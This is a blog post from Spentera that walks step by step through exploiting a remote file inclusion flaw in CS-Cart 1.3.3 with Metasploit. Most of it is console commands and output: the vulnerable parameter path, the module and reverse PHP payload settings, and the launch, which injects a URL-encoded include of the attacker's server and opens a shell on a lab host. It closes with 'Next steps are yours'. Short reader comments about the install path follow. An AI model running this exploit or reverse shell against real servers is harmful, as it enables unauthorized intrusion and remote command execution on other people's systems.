PHP include exploitation with Metasploit - Spentera Blog

PHP include exploitation with Metasploit

by Spentera / May 21, 2010

Metasploit support for PHP Include exploitation, or simply known as RFI (Remote File Inclusion). I will show you how this work on CS-Cart 1.3.3 which vulnerable to remote file inclusion.

The vulnerable path is at classes/phpmailer/class.cs_phpmailer.php?classes_dir=[include arbitrary php code]

so in Metasploit, the PHPURI PATH will be like this:

classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX

let see how this exploitation works.

msf > search php_include
[*] Searching loaded modules for pattern 'php_include'...

Exploits
========

Name Rank Description
---- ---- -----------
unix/webapp/php_include excellent PHP Remote File Include Generic Exploit

msf exploit(php_include) > set payload php/reverse_php
payload => php/reverse_php
msf exploit(php_include) > show options

Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
PATH /commerce yes The base directory to prepend to the URL to try
PHPRFIDB /opt/metasploit3/msf3/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX no The URI to request, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST 192.168.20.253 yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host

Payload options (php/reverse_php):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The local address
LPORT 4444 yes The local port

Exploit target:

Id Name
-- ----
0 Automatic

msf exploit(php_include) >

Now we set all options.

msf exploit(php_include) > set PATH /commerce
PATH => /commerce
msf exploit(php_include) > set PHPURI /classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX
PHPURI => /classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX
msf exploit(php_include) > set RHOST 192.168.20.253
RHOST => 192.168.20.253

After all options meet requirement, let’s launch the exploit.

msf exploit(php_include) > exploit

[*] Started reverse handler on 192.168.20.243:4444
[*] Using URL: http://0.0.0.0:8080/vDcG9L
[*] Local IP: http://192.168.20.243:8080/vDcG9L
[*] PHP include server started.
[*] Sending /commerce/classes/phpmailer/class.cs_phpmailer.php?classes_dir=%68%74%74%70%3a%2f%2f%31%39%32%2e%31%36%38%2e%32%30%2e%32%34%33%3a%38%30%38%30%2f%76%44%63%47%39%4c%3f
[*] Command shell session 1 opened (192.168.20.243:4444 -> 192.168.20.253:2455) at 2010-05-21 11:36:45 +0700

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Next steps are yours 😉

Comments ( 2 )

  • utkarsh / October 31, 2017

    From where did you get the path variable ? I see you have set it to /commerce where did you get this ?

    • Thomas Gregory / October 31, 2017

      Hi utkarsh, the /commerce came from my installation of the vulnerable CS-Cart 1.3.3. I made the CS-Cart root directory pointed to /var/www/commerce, that’s why it can be accessed to http://x.x.x.x/commerce. Hope this help answer your question.

Leave a Comments

Your email address will not be published. Required fields are marked *